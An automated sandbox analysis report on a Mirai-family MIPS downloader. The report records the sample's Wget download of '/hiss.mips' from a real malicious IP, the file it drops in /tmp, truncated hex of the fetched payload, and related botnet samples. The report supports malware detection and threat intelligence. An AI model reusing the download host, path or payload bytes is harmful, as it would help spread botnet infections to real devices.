Edit tour

Linux Analysis Report
dlr.mips.elf

Overview

General Information

Sample name:	dlr.mips.elf
Analysis ID:	1546737
MD5:	87cf97359604746cbca018ba33cf8bfc
SHA1:	d07ad880b56cf29da33a36aa9533d24c022a0cfd
SHA256:	a5c044028e5b2aa2cb837419dba772124ac293529251089727ddde63c6745dec
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Found strings indicative of a multi-platform dropper

Sample has stripped symbol table

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546737
Start date and time:	2024-11-01 15:05:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	dlr.mips.elf
Detection:	MAL
Classification:	mal48.linELF@0/1@0/0

Warnings

Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: dlr.mips.elf

Runtime Messages

Command:	/tmp/dlr.mips.elf
PID:	5843
Exit Code:	5
Exit Code Info:
Killed:	False
Standard Output:	RAWR :3
Standard Error:

Process Tree

system is lnxubuntu20

dlr.mips.elf (PID: 5843, Parent: 5767, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/dlr.mips.elf

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: dlr.mips.elf

ReversingLabs: Detection: 21%

Source: dvrHelper.12.dr

String: W|||self(deleted)/dev/usr//bin//sbin//cmdlinewgetcurlftp

Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55
Source: unknown	TCP traffic detected without corresponding DNS query: 190.123.46.55

Source: global traffic

HTTP traffic detected: GET /hiss.mips HTTP/1.0User-Agent: Wget

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal48.linELF@0/1@0/0

Source: /tmp/dlr.mips.elf (PID: 5843)

File written: /tmp/dvrHelper

Jump to dropped file

Source: /tmp/dlr.mips.elf (PID: 5843)

Queries kernel information via 'uname':

Jump to behavior

Source: dlr.mips.elf, 5843.1.0000558fad56d000.0000558fad5f4000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mips
Source: dlr.mips.elf, 5843.1.0000558fad56d000.0000558fad5f4000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: dlr.mips.elf, 5843.1.00007ffd05914000.00007ffd05935000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: dlr.mips.elf, 5843.1.00007ffd05914000.00007ffd05935000.rw-.sdmp	Binary or memory string: ax86_64/usr/bin/qemu-mips/tmp/dlr.mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.mips.elf

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	Direct Volume Access	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
dlr.mips.elf	21%	ReversingLabs	Linux.Downloader.Mirai

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
190.123.46.55	unknown	Panama		265540	ALTANREDESSAPIdeCVMX	false

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ALTANREDESSAPIdeCVMX	dlr.arm5.elf	Get hash	malicious	Unknown	Browse	190.123.46.21
	bot.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	190.123.46.52
	bot.arm5.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	190.123.46.52
	bot.m68k.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	190.123.46.52
	bot.mpsl.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	190.123.46.52
	bot.mips.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	190.123.46.52
	bot.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	190.123.46.52
	bot.sh4.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	190.123.46.52
	bot.x86_64.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	190.123.46.52
	bot.ppc.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	190.123.46.52

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/tmp/dvrHelper

Download File

Process:	/tmp/dlr.mips.elf
File Type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Category:	dropped
Size (bytes):	114228
Entropy (8bit):	5.36111521725104
Encrypted:	false
SSDEEP:	1536:7vlL8oK5rrVanJfhHuvJ+QQtf4tUpLuuhLh+TJXtBLL5/FQMqnDs8M9x3o:V8F5rrcnJfhHuvJJuuuph+DFAs8Qdo
MD5:	3F3C1B5F304F85A8DD1AEA1DD763E55B
SHA1:	9648526FCFF3ED1F643A5E20109CF8154C419F35
SHA-256:	89A366C68EFD8BA39C85295A3428E2CE67CDF5EFD7A1A430123B80FBDF528388
SHA-512:	9C9E3AA06F493021034CFB588C5058CA5DCB845F797E4F970A7D521DF0EF0074B9336173D176251C5AEC3F7D3FE069EDE427C98470B8CFA7BD008917B0ED18A7
Malicious:	false
Reputation:	low
Preview:	.ELF.....................@.....4...<.....4. ...(....p........@...@...........................@...@...........................E...E.....T..NP........dt.Q.................................................F.@<...'..t...!'.....................<...'..P...!........'9... ......................<...'.. ...!... ....'9p`. ..........................'.. ........<...'......!'..... .....................".`.....@.................P.....Y....... ..$B... .....P...P.....Y....... ..$B.....H.....@..$..........H..... ..$.......$....".`... ............'..(<...'..$...!'..................@..................$.... ..$..d.........................@............... ..$........ ..'.. ............'.. ...........!........<...'......!...!...T....'...$......$'.............................\|..... ..........................<...'.. ...!'........................ ..........&.......&.......&............@.!........$B......&.......................'.. <...'......!'.....0...,...(...$... ...............D...!..... .....!....

Static File Info

General

File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	4.789405361037801
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	dlr.mips.elf
File size:	2'080 bytes
MD5:	87cf97359604746cbca018ba33cf8bfc
SHA1:	d07ad880b56cf29da33a36aa9533d24c022a0cfd
SHA256:	a5c044028e5b2aa2cb837419dba772124ac293529251089727ddde63c6745dec
SHA512:	80cdec0ce9a4a4fbc9c8bd1bfb2bcfe06c186903d0f298eb1cdbdf05591c5d82c9583aedca73e1df16a52e6ca28ab177567ac4569168dacc87aca134db03e323
SSDEEP:	48:ZzJmYdYQfi9bY1dHfu4qJ/EYEBD3WlrBZ4rmWy31:lJme69b3/EYEBDWlrBUo1
TLSH:	CD41CFCE1B759EF4F499D53847334B356A9A550803D44246E1ECE9101FD034D859FBE9
File Content Preview:	.ELF.....................@.....4.........4. ...(.............@...@.....x...x.................D...D.....T...p........dt.Q........................................0...0........G.%..&.0....D.%..2......F.%<...'......!...\..(!. ..$...<...'......!...\..(!. ..$..

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4004f8
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	1800
Section Header Size:	40
Number of Section Headers:	7
Header String Table Index:	6

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.text	PROGBITS	0x4000a0	0xa0	0x580	0x0	0x6	AX	16
.rodata	PROGBITS	0x400620	0x620	0x58	0x1	0x32	AMS	4
.got	PROGBITS	0x440680	0x680	0x54	0x4	0x10000003	WAp	16
.bss	NOBITS	0x4406e0	0x6d4	0x10	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0x36	0x6d4	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x6d4	0x31	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x678	0x678	5.1269	0x5	R E	0x10000	.text .rodata
LOAD	0x680	0x440680	0x440680	0x54	0x70	2.4186	0x6	RW	0x10000	.got .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 15:06:19.565557957 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:19.570431948 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:19.570487976 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:19.571491957 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:19.576308966 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.328572989 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.328682899 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.328701973 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.328716040 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.328727961 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.328763962 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.328763962 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.328764915 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.328885078 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.328896999 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.328907967 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.328918934 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.328932047 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.328932047 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.328958035 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.328958035 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.329041958 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.329061031 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.329083920 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.329098940 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.334961891 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.335000038 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.335103989 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.335115910 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.335149050 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.335149050 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.447140932 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.447169065 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.447191000 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.447235107 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.480254889 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.480292082 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.480293036 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.480305910 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.480317116 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.480542898 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.480566978 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.480577946 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.480649948 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.480663061 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.481477976 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.481549978 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.481561899 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.481574059 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.481585026 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.481676102 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.482141018 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.482161999 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.482173920 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.482184887 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.482791901 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.482803106 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.482814074 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.482825041 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.482836008 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.483577013 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.483890057 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.599545002 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.599688053 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.599698067 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.599709034 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.599726915 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.599737883 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.600065947 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.600085020 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.600095034 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.600372076 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.600413084 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.600425959 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.600492954 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.600506067 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.600517035 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.601260900 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.601277113 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.601288080 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.601300955 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.601304054 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.601313114 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.601325989 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.601337910 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.602055073 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.602065086 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.602076054 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.603559017 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.606462955 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.606529951 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.608237982 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.726512909 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.731379032 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.731448889 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.731462002 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.731473923 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.731484890 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.731497049 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.731508017 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.731873035 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.731982946 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.731996059 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.732007980 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.732018948 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.732031107 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.732043982 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.732098103 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.732692003 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.732734919 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.733917952 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.737473011 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.737487078 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.737498045 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.737592936 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:20.953058958 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:20.953105927 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:21.012587070 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:21.017960072 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018055916 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018066883 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018080950 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018091917 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018100977 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018111944 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018397093 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018438101 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018472910 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018559933 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018569946 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018580914 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018589973 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.018599033 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.019996881 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:21.241064072 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.241110086 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:21.307811022 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:21.312693119 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.312706947 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.312736988 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:21.312977076 CET	80	51814	190.123.46.55	192.168.2.15
Nov 1, 2024 15:06:21.313633919 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:22.526515007 CET	51814	80	192.168.2.15	190.123.46.55
Nov 1, 2024 15:06:22.531444073 CET	80	51814	190.123.46.55	192.168.2.15

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.15	51814	190.123.46.55	80

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 15:06:19.571491957 CET	57	OUT	GET /hiss.mips HTTP/1.0 User-Agent: Wget
Nov 1, 2024 15:06:20.328572989 CET	620	IN	HTTP/1.0 200 OK Date: Fri, 01 Nov 2024 14:06:20 GMT Content-Type: application/octet-stream Data Raw: 7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 00 02 00 08 00 00 00 01 00 40 02 b0 00 00 00 34 00 01 bb 3c 00 00 10 07 00 34 00 20 00 04 00 28 00 13 00 12 70 00 00 00 00 00 00 b4 00 40 00 b4 00 40 00 b4 00 00 00 18 00 00 00 18 00 00 00 04 00 00 00 04 00 00 00 01 00 00 00 00 00 40 00 00 00 40 00 00 00 01 8c e8 00 01 8c e8 00 00 00 05 00 01 00 00 00 00 00 01 00 01 90 00 00 45 90 00 00 45 90 00 00 00 08 54 00 00 4e 50 00 00 00 06 00 01 00 00 64 74 e5 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 13 40 3c 1c 00 06 27 9c 12 74 03 99 e0 21 27 bd ff e0 af bc 00 10 af bf 00 1c af bc 00 18 04 11 00 01 00 00 00 00 3c 1c 00 06 27 9c 12 50 03 9f e0 21 8f 99 80 1c 00 00 00 00 27 39 02 1c 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 04 11 00 01 00 00 00 00 3c 1c 00 06 27 9c 12 20 03 9f e0 21 8f 99 80 20 00 00 00 00 27 39 70 60 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 8f bf 00 1c 00 00 00 00 03 e0 [TRUNCATED] Data Ascii: ELF@4<4 (p@@@@EETNPdtQF@<'t!'<'P!'9 <' ! '9p` ' <'!' "`@PY $B PPY $BH@$H $
Nov 1, 2024 15:06:20.328701973 CET	1236	IN	Data Raw: 24 02 00 01 a2 22 98 60 8f bf 00 20 8f b1 00 1c 8f b0 00 18 03 e0 00 08 27 bd 00 28 3c 1c 00 06 27 9c 11 24 03 99 e0 21 27 bd ff e0 af bf 00 18 af bc 00 10 8f 82 80 bc 00 00 00 00 10 40 00 09 00 00 00 00 8f 84 80 18 8f 85 80 18 8f 99 80 bc 24 84 Data Ascii: $"` '(<'$!'@$ $d@ $ ' ' !<'!!T'$$'
Nov 1, 2024 15:06:20.328716040 CET	1236	IN	Data Raw: 8e 24 00 00 03 20 f8 09 00 00 00 00 8f bc 00 18 00 00 00 00 8f 99 84 20 10 00 ff ed 24 04 00 01 8f 99 81 6c 00 00 00 00 03 20 f8 09 00 00 20 21 3c 1c 00 06 27 9c 0c 48 03 99 e0 21 27 bd ff d8 af bf 00 24 af b0 00 20 af bc 00 10 8f 99 84 24 00 80 Data Ascii: $ $l !<'H!'$ $! $$ ' !@(! $@@H $$ $'(H $$ !'(<'
Nov 1, 2024 15:06:20.328727961 CET	1236	IN	Data Raw: 8f 99 84 18 27 c3 00 48 af d9 00 d0 8f 99 80 c8 8f 95 84 f4 af d9 00 d4 8f 99 83 0c af c2 00 dc af d9 00 d8 8f 99 84 d4 af c3 00 e4 af d9 00 e0 8f 99 84 14 27 c2 00 28 af d9 00 ec 8f 99 84 20 27 c3 00 2c 03 20 b8 21 8f 99 80 b4 00 00 90 21 af d9 Data Ascii: 'H'( ', !!!'0'$$ 0!@@ !$ $$8<8@ D<4cCdd!e<
